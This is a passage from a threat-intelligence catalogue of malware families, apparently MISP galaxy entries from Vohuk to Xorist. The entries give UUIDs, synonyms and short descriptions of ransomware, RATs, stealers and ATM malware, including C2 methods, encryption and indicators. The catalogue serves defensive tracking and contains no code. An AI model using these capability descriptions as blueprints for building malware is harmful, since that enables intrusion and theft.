UUID f2c91bfb-1b22-4399-849a-f07304c2e81f which can be used as unique global reference for Vohuk in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Void

Ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Void.

Known Synonyms
`VoidCrypt`

Internal MISP references

UUID 55f66b60-5284-4db6-b26e-52b3aea17641 which can be used as unique global reference for Void in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Voidoor

Internal MISP references

UUID e9525c0d-0fba-4a0c-8b9d-31acc21194db which can be used as unique global reference for Voidoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VoidRAT

Internal MISP references

UUID d78756c3-912a-438e-b9d2-d41ae95f42c3 which can be used as unique global reference for VoidRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Voldemort

Voldemort is a backdoor discovered by Proofpoint in August 2024. It is being distributed via phishing E-Mails and makes use of creative techniques such as using saved search files during the infection chain for obfuscation and Google Sheets for C2. While its broad targeting looks like it is related to ecrime, Proofpoint notes that the capabilities of the malware point towards espionage/APT activity.

Internal MISP references

UUID c87d3310-07fd-4e3a-88ca-9ccb0a339876 which can be used as unique global reference for Voldemort in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Volgmer

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Volgmer.

Known Synonyms
`FALLCHILL`
`Manuscrypt`

Internal MISP references

UUID bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f which can be used as unique global reference for Volgmer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vovalex

Ransomware written in D.

Internal MISP references

UUID fe4ffa8d-74d2-472a-b0ca-83f9e7f95739 which can be used as unique global reference for Vovalex in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vreikstadi

Internal MISP references

UUID ab2a63f1-1afd-44e7-9cf4-c775dbee78f4 which can be used as unique global reference for Vreikstadi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vshell

Vshell is an OST framework written in Go, enabling availability of implants for multiple platforms (Windows, Linux, macOS).

Internal MISP references

UUID b7055f10-84a9-4380-ae76-6094c23ef8b7 which can be used as unique global reference for Vshell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VSingle

Internal MISP references

UUID a9afe6ba-732a-45fe-a925-2b61b05e5a76 which can be used as unique global reference for VSingle in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

vSkimmer

Internal MISP references

UUID 3eae1764-7ea6-43e6-85a1-b1dd0b4856b8 which can be used as unique global reference for vSkimmer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vulturi

Information stealer.

Internal MISP references

UUID cfbd52a9-39d6-46f4-a539-76abcec92088 which can be used as unique global reference for Vulturi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Vyveva RAT

Vyveva is a remote access trojan that uses the Tor library for communication with C&C. Its use of fake TLS for camouflaging the network traffic is one of the typical Lazarus traits.

It uses a simple XOR for encryption of its configuration and network traffic.

It sends detailed information about the victim's environment, like computer name, user name, IP, code page, Windows version, architecture, and time zone.

It supports more than 20 commands that include operations on the victim’s filesystem, basic process management, command line execution, file exfiltration, and the download and memory execution of an additional DLL from the C&C (by calling the expected export SamIPromote). As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. The lowest index is 0x3, followed by 0x10, which goes incrementally up to 0x26. Also, it can monitor newly connected drives and the number of logged-on users.

It has MPRD.dll as the internal DLL name, and a single export SamIInitialize.

Vyveva RAT was used in an attack against a freight logistics company in South Africa in June 2020.

Internal MISP references

UUID b7f0ba08-8e7c-43cd-9b26-8dfef763a404 which can be used as unique global reference for Vyveva RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

w32times

Internal MISP references

UUID 2479b6b9-c818-4f96-aba4-47ed7855e4a8 which can be used as unique global reference for w32times in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

win.wabot

Wabot is an IRC worm that is written in Delphi.

Internal MISP references

UUID cce35d3d-aea0-4e59-92cf-3289be4a4c21 which can be used as unique global reference for win.wabot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

wAgentTea

wAgentTea is an HTTP(S) downloader.

It was deployed mostly against South Korean targets like a pharmaceutical company (Q4 2020) or semiconductor industry (Q2 2023). In several cases, the initial access was obtained via exploitation of South Korean software like Initech's INISAFE CrossWeb EX or Dream Security’s MagicLine4NX.

It uses AES-128 for encryption and decryption of its network traffic, and for decryption of its binary configuration.

There is a hard-coded list of parameter names used in its HTTP POST request: identy;tname;blogdata;content;thesis;method;bbs;level;maincode;tab;idx;tb;isbn;entry;doc; category;articles;portal

It contains a specific RTTI symbol ".?AVCHttp_socket@@".

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular wAgentTea.

Known Synonyms
`wAgent`

Internal MISP references

UUID 03bf5a8b-774c-498a-9fa2-b4027695fd00 which can be used as unique global reference for wAgentTea in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WallyShack

Internal MISP references

UUID 0bd92907-c858-4164-87d6-fec0f3595e69 which can be used as unique global reference for WallyShack in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WannaCryptor

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WannaCryptor.

Known Synonyms
`Wana Decrypt0r`
`WannaCry`
`WannaCrypt`
`Wcry`

Internal MISP references

UUID ad67ff31-2a02-43f9-8b12-7df7e4fcccd6 which can be used as unique global reference for WannaCryptor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WannaHusky

According to Mars, WannaHusky is a Nim-compiled ransomware malware sample, created for demonstration purposes and provided as part of the Practical Malware Analysis & Triage course provided by HuskyHacks.

Internal MISP references

UUID 10fc30fe-9f64-4765-a341-acde878f105c which can be used as unique global reference for WannaHusky in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WannaRen

Ransomware.

Internal MISP references

UUID 44f548e2-9a47-433a-bccf-fff412d2963b which can be used as unique global reference for WannaRen in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Warezov

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Warezov.

Known Synonyms
`Opnis`
`Stration`

Internal MISP references

UUID 925a5c68-5c9c-45ae-a3a5-8ba5ba692ada which can be used as unique global reference for Warezov in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WarHawk

Internal MISP references

UUID 92e52625-f8eb-422e-b277-0bc994c19bb4 which can be used as unique global reference for WarHawk in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WarmCookie

WarmCookie is backdoor that is capable of executing commands reading/writing files and capturing screenshots. It communicates with a command and control (C&C) server via HTTP to receive further instructions and exfiltrate stolen data. It is commonly distributed through phishing campaigns and malicious downloads, targeting unsuspecting users to infiltrate systems undetected.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WarmCookie.

Known Synonyms
`Badspace`
`KongTuke`
`QUICKBIND`

Internal MISP references

UUID 2088185c-4ac4-4956-968e-103edc955f4e which can be used as unique global reference for WarmCookie in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WastedLoader

This malware looks similar to WastedLocker, but the ransomware component is missing.

Internal MISP references

UUID c6b601f6-4cb6-4e7b-98fd-35af910ec0d8 which can be used as unique global reference for WastedLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WastedLocker

WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.

Internal MISP references

UUID e72a0bde-ea5b-4450-bc90-b5d2dca697b4 which can be used as unique global reference for WastedLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Waterbear

Waterbear, also known as DbgPrint in its earlier export function, has been active since 2009. The malware is presumably developed by the BlackTech APT group and adopts advanced anti-analysis and forward-thinking design. These designs include a sophisticated shellcode stager, the ability to load plugins on-the-fly, and overall evasiveness should the C2 server fail to respond with a valid session key.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Waterbear.

Known Synonyms
`DbgPrint`
`EYEWELL`

Internal MISP references

UUID 042ddeed-78e4-4799-965a-3b6815145f28 which can be used as unique global reference for Waterbear in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WaterMiner

Internal MISP references

UUID d536931e-ad4f-485a-b93d-fe05f23a9367 which can be used as unique global reference for WaterMiner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WaterSpout

Internal MISP references

UUID d238262a-4832-408f-9926-a7174e671b50 which can be used as unique global reference for WaterSpout in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Wave Stealer

Wave Stealer is an infostealer offered as Malware-as-a-Service by a French-speaking actor called "Wave". The threat actor has strong relationships with Nova Stealer's and Epsilon Stealer's groups. It's capabilities include passwords and crypto-wallet stealing, discord and telegram injection, and backup codes finder.

Internal MISP references

UUID 211b7cfe-51e8-4dfe-af12-5f350e49af86 which can be used as unique global reference for Wave Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WavyExfiller

Internal MISP references

UUID 6df6bf6d-8069-4923-914f-b56b2a111972 which can be used as unique global reference for WavyExfiller in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebbyTea

WebbyTea is an HTTP(S) downloader that uses AES for C&C trafic encryption.

It sends detailed information about the victim's environment, like proxy settings, system instalation date, Windows product name and version, manufacturer, product name, system boot time, time zone, computer name, user name, current time and a list of currently running processes. Data sent to the C&C server consists of the prefix "ci", a 16-characters long hexadecimal string representing the victim ID and an encrypted data about the victim's system. After the payload is acquired from the server and successfully injected in a newly created explorer.exe process, the malware responds back with the same victim ID having the prefix changed to "cs".

The internal DLL name of the native WebbyTea is usually pe64.dll or webT64.dll (from which its name is derived).

The usual payload associated with WebbyTea is SnatchCrypto.

Internal MISP references

UUID e8056d43-7dd7-49ae-8cd7-07be367fb6b4 which can be used as unique global reference for WebbyTea in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebC2-AdSpace

Internal MISP references

UUID e57c677f-0117-4e23-8c3f-a772ed809f4c which can be used as unique global reference for WebC2-AdSpace in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebC2-Ausov

Internal MISP references

UUID 64f5ae85-1324-43de-ba3a-063785567be0 which can be used as unique global reference for WebC2-Ausov in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebC2-Bolid

Internal MISP references

UUID 71292a08-9a7b-4df1-b1fd-7d80a8fcc18f which can be used as unique global reference for WebC2-Bolid in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebC2-Cson

Internal MISP references

UUID 5371bc44-dc07-4992-a3d7-c21705c50ac4 which can be used as unique global reference for WebC2-Cson in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebC2-DIV

Internal MISP references

UUID acdda3e5-e776-419b-b060-14f3406de061 which can be used as unique global reference for WebC2-DIV in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebC2-GreenCat

Internal MISP references

UUID cfed10ed-6601-469e-a1df-2d561b031244 which can be used as unique global reference for WebC2-GreenCat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebC2-Head

Internal MISP references

UUID f9f37707-36cf-4ad0-88e0-86f47cbe0ed6 which can be used as unique global reference for WebC2-Head in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebC2-Kt3

Internal MISP references

UUID 15094548-7555-43ee-8c0d-4557d6d8a087 which can be used as unique global reference for WebC2-Kt3 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebC2-Qbp

Internal MISP references

UUID 71d8ef43-3767-494b-afaa-f58aad70df65 which can be used as unique global reference for WebC2-Qbp in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebC2-Rave

Internal MISP references

UUID 5350bf3a-26b0-49fb-a0b8-dd68933ea78c which can be used as unique global reference for WebC2-Rave in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebC2-Table

Internal MISP references

UUID 1035ea6f-6743-4e69-861c-454c19ec96ae which can be used as unique global reference for WebC2-Table in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebC2-UGX

Internal MISP references

UUID b459033c-2d19-49aa-a21f-44a01d1a4156 which can be used as unique global reference for WebC2-UGX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebC2-Yahoo

Internal MISP references

UUID 52c1518d-175c-4b39-bc7c-353d2ddf382e which can be used as unique global reference for WebC2-Yahoo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WebMonitor RAT

On its website, Webmonitor RAT is described as 'a very powerful, user-friendly, easy-to-setup and state-of-the-art monitoring tool. Webmonitor is a fully native RAT, meaning it will run on all Windows versions and languages starting from Windows XP and up, and perfectly compatible with all crypters and protectors.' Unit42 notes in their analysis that it is offered as C2-as-a-service and raises the controversial aspect that the builder allows to create client binaries that will not show any popup or dialogue during installation or while running on a target system.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WebMonitor RAT.

Known Synonyms
`RevCode`

Internal MISP references

UUID fa3d196b-b757-49b7-a06d-77c77ac151c4 which can be used as unique global reference for WebMonitor RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WeControl

Internal MISP references

UUID 541720a8-a125-4277-b109-c04e475c4cc3 which can be used as unique global reference for WeControl in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WellMess

WellMess is A Remote Access Trojan written in GoLang and .NET. It has hard-coded User-Agents. Attackers deploy WellMess using separate tools which also allow lateral movement, for example "gost". Command and Control traffic is handled via HTTP using the Set-Cookie field and message body.

Internal MISP references

UUID d84ebd91-58f6-459f-96a1-d028a1719914 which can be used as unique global reference for WellMess in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WeSteal

Internal MISP references

UUID 8ec2d984-8c10-49f2-ad97-64af275a7afc which can be used as unique global reference for WeSteal in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WhiskerSpy

Internal MISP references

UUID 821b2c61-31b0-41f5-b604-e58678bf287b which can be used as unique global reference for WhiskerSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WhisperGate

Destructive malware deployed against targets in Ukraine in January 2022.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WhisperGate.

Known Synonyms
`PAYWIPE`

Internal MISP references

UUID 6001ed9f-9108-4481-9980-dc6e5c1908a0 which can be used as unique global reference for WhisperGate in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WhiteBird

According to Dr.Web, WhiteBird is a backdoor written in C++ and designed to operate in both 32-bit and 64-bit Microsoft Windows operating systems. The configuration is encrypted with a single byte XOR key. An interesting feature is that the malware can be restricted to operate only within certain "working_hours" with a granularity of one minute.

Internal MISP references

UUID 20286294-3813-4c17-a165-ef12aae64303 which can be used as unique global reference for WhiteBird in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WhiteBlackCrypt

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WhiteBlackCrypt.

Known Synonyms
`WARYLOOK`

Internal MISP references

UUID f587a5a2-907e-456c-91e9-74fd997c03b5 which can be used as unique global reference for WhiteBlackCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WhiteSnake Stealer

WhiteSnake Stealer, discovered in February 2022, is a sophisticated .NET data-stealing malware that targets browsers, applications, and crypto wallets.

The builder can build payloads in different file formats such as EXE, SCR, COM, CMD, BAT, VBS, PIF, WSF, .hta, MSI, PY, DOC, DOCM, XLS, XLL, XLSM. Some of these (python, bash) allow the malware to run on Linux systems.

The stealer has two execution methods:

Non-resident - the stealer auto-deletes itself after successful execution
Resident - the stealer beacons out to the C2 (possibly in the TOR network)

WhiteSnake Stealer can gather system information, execute remote commands, spread through USB drives, and perform tasks like keylogging, file management, and webcam access.

Internal MISP references

UUID 8f5bb3ec-a764-4ef4-a113-532a3d4b82c4 which can be used as unique global reference for WhiteSnake Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WikiLoader

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WikiLoader.

Known Synonyms
`WailingCrab`

Internal MISP references

UUID 8dd43a3f-320a-4bdd-8379-b592cd6efc1f which can be used as unique global reference for WikiLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WildFire

Internal MISP references

UUID 2f512a73-6847-4231-81c6-8b51af8b5be2 which can be used as unique global reference for WildFire in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire - webarchive

Associated metadata

Metadata key	Value
type	[]

WinDealer

Information stealer used by threat actor LuoYu.

Internal MISP references

UUID 3aa42316-9f3b-457b-9560-99ccf00a45c1 which can be used as unique global reference for WinDealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WINELOADER

Internal MISP references

UUID 3e0693b5-cbda-4dea-a7d5-768cc214ac0b which can be used as unique global reference for WINELOADER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WinInetLoader

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WinInetLoader.

Known Synonyms
`LIDSHOT`

Internal MISP references

UUID 5801591a-d6f1-45b1-8abd-718257dd2433 which can be used as unique global reference for WinInetLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

winlog

Internal MISP references

UUID 772099d0-b74a-4a73-9967-f1d40ab3ac92 which can be used as unique global reference for winlog in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WinMM

Internal MISP references

UUID 6a100902-7204-4f20-b838-545ed86d4428 which can be used as unique global reference for WinMM in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Winnti (Windows)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Winnti (Windows).

Known Synonyms
`BleDoor`
`JUMPALL`
`Pasteboy`
`RbDoor`

Internal MISP references

UUID 7f8166e2-c7f4-4b48-a07b-681b61a8f2c1 which can be used as unique global reference for Winnti (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WinorDLL64

According to ESET Research, this is a payload downloaded by win.wslink. They attribute it with low confidence to Lazarus.

Internal MISP references

UUID 64f7f940-db4c-4569-869b-d282dadf55ac which can be used as unique global reference for WinorDLL64 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WinPot

WinPot is created to make ATMs by a popular ATM vendor to automatically dispense all cash from their most valuable cassettes.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WinPot.

Known Synonyms
`ATMPot`

Internal MISP references

UUID 893a1da2-ae35-4877-8cde-3f532543af36 which can be used as unique global reference for WinPot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WinScreeny

Backdoor used in the EvilPlayout campaign against Iran's State Broadcaster.

Internal MISP references

UUID b45a1776-11a8-4ac9-9714-33cb17709166 which can be used as unique global reference for WinScreeny in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Winsloader

Internal MISP references

UUID db755407-4135-414c-90e3-97f5e48c6065 which can be used as unique global reference for Winsloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Wipbot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Wipbot.

Known Synonyms
`Epic`
`Tavdig`

Internal MISP references

UUID 6b6cf608-cc2c-40d7-8500-afca3e35e7e4 which can be used as unique global reference for Wipbot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WMI Ghost

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WMI Ghost.

Known Synonyms
`Syndicasec`
`Wimmie`

Internal MISP references

UUID 892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40 which can be used as unique global reference for WMI Ghost in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WndTest

Internal MISP references

UUID d8bf4ea1-054c-4a88-aa09-48da0d89c322 which can be used as unique global reference for WndTest in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Wonknu

Internal MISP references

UUID bfa75eb1-1d8d-4127-932f-3b7090a242e9 which can be used as unique global reference for Wonknu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

woody

Internal MISP references

UUID 42e23d17-8f1b-43c9-bc76-e3cf098b5c52 which can be used as unique global reference for woody in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Woody RAT

Internal MISP references

UUID 9828a0ad-bb48-4cb5-b4f4-9b4133fa044f which can be used as unique global reference for Woody RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Woolger

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Woolger.

Known Synonyms
`WoolenLogger`

Internal MISP references

UUID 258751c7-1ddb-4df6-9a17-36b08c2cb267 which can be used as unique global reference for Woolger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WorldWind

Information Stealer.

Internal MISP references

UUID ebeca38e-0855-46e1-b46c-95405917231e which can be used as unique global reference for WorldWind in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WORMHOLE

WORMHOLE is a TCP tunneler that is dynamically configurable from a C&C server and can communicate with an additional remote machine endpoint for a relay.

Internal MISP references

UUID c1bff74d-873d-41ad-9f76-b341e6fe5cb9 which can be used as unique global reference for WORMHOLE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WormLocker

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WormLocker.

Known Synonyms
`WormLckr`

Internal MISP references

UUID 4cc30b46-53c0-45c4-8847-e3b228bf8d7b which can be used as unique global reference for WormLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WpBruteBot

Internal MISP references

UUID 454e0737-98d6-499a-8562-1adf5c081d0d which can be used as unique global reference for WpBruteBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WSCSPL

Internal MISP references

UUID 62fd2b30-55b6-474a-8d72-31e492357d11 which can be used as unique global reference for WSCSPL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Wslink

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Wslink.

Known Synonyms
`FinickyFrogfish`

Internal MISP references

UUID 63fc32b0-3017-418c-b00a-ae20205e9c90 which can be used as unique global reference for Wslink in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

x4

Internal MISP references

UUID 107341e7-e045-4798-9fab-16691e86bc58 which can be used as unique global reference for x4 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

X-Agent (Windows)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular X-Agent (Windows).

Known Synonyms
`chopstick`
`splm`

Internal MISP references

UUID e8b38fbd-a7ce-4073-a660-44dfabc1b678 which can be used as unique global reference for X-Agent (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XBot POS

Internal MISP references

UUID c6467cc3-dafd-482e-881e-ef2e7e244436 which can be used as unique global reference for XBot POS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XBTL

Internal MISP references

UUID fb3a8164-d8cb-495d-9b1c-57bed00c21ed which can be used as unique global reference for XBTL in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl - webarchive

Associated metadata

Metadata key	Value
type	[]

xCaon

Checkpoint Research found this backdoor, attributed to IndigoZebra, used to target Afghan and other Central-Asia countries, including Kyrgyzstan and Uzbekistan, since at least 2014.

Internal MISP references

UUID 2c150ebc-8fdf-4324-96cd-d6b0c0087d55 which can be used as unique global reference for xCaon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XData

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XData.

Known Synonyms
`AESNI`

Internal MISP references

UUID 2fa666de-cab2-4c25-aa65-e5d162a979c9 which can be used as unique global reference for XData in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XDSpy

According to ESET Research, XDDown is a primary malware component and is strictly a downloader. It persists on the system using the traditional Run key. It downloads additional plugins from the hardcoded C&C server using the HTTP protocol. The HTTP replies contain PE binaries encrypted with a hardcoded two-byte XOR key. Plugins include a module for reconnaissance on the affected system, crawling drives, file exfiltration, SSID gathering, and grabbing saved passwords.

Internal MISP references

UUID 2cf836f5-b88a-417d-b3c6-ab2580fea6ad which can be used as unique global reference for XDSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XehookStealer

Xehook is a .NET-based malware targeting Windows systems. It collects data from Chromium and Gecko browsers, supporting over 110 cryptocurrencies and 2FA extensions. CRIL found a potential link between Xehook Stealer, Agniane, and the Cinoshi project, suggesting a progression from a free MaaS model to the development of Xehook Stealer. SmokeLoader binaries were identified as a common vector for distributing Xehook Stealer. Xehook Stealer shares code overlaps with Agniane Stealer, indicating an evolutionary relationship.

Internal MISP references

UUID 93780092-2007-49df-8d14-2701ae5a4c57 which can be used as unique global reference for XehookStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XenArmor

XenArmor is a suite of password recovery tools for various applications that have been observed to be abused in attacks alongside malware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XenArmor.

Known Synonyms
`XenArmor Suite`

Internal MISP references

UUID 79fd77ba-4b40-4354-820a-16662edba41d which can be used as unique global reference for XenArmor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Xenon Stealer

Internal MISP references

UUID 09fd85b1-6fc9-45af-a37e-732b5fc6447b which can be used as unique global reference for Xenon Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XenoRAT

Internal MISP references

UUID 77f922e2-3787-4564-ba68-333ea3b948ba which can be used as unique global reference for XenoRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

X-Files Stealer

Internal MISP references

UUID 4e980ff8-20f2-4b3f-bad8-763321932b99 which can be used as unique global reference for X-Files Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XFSADM

Internal MISP references

UUID e78a2a31-8c20-4493-b854-c708e81b3f41 which can be used as unique global reference for XFSADM in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XFSCashNCR

Internal MISP references

UUID ba99edf0-1603-4f54-8fa9-18852417d0fc which can be used as unique global reference for XFSCashNCR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Xiangoop

Internal MISP references

UUID b61903a1-51e6-493c-885f-6ffda99371ea which can be used as unique global reference for Xiangoop in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

XiaoBa

Ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XiaoBa.

Known Synonyms
`FlyStudio`

Internal MISP references

UUID e839ae61-616c-4234-8edb-36b48040e5af which can be used as unique global reference for XiaoBa in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

xmrig

According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".

In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.

Internal MISP references

UUID 88efd461-03dd-42eb-976c-5e9fe403fce6 which can be used as unique global reference for xmrig in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Xorist

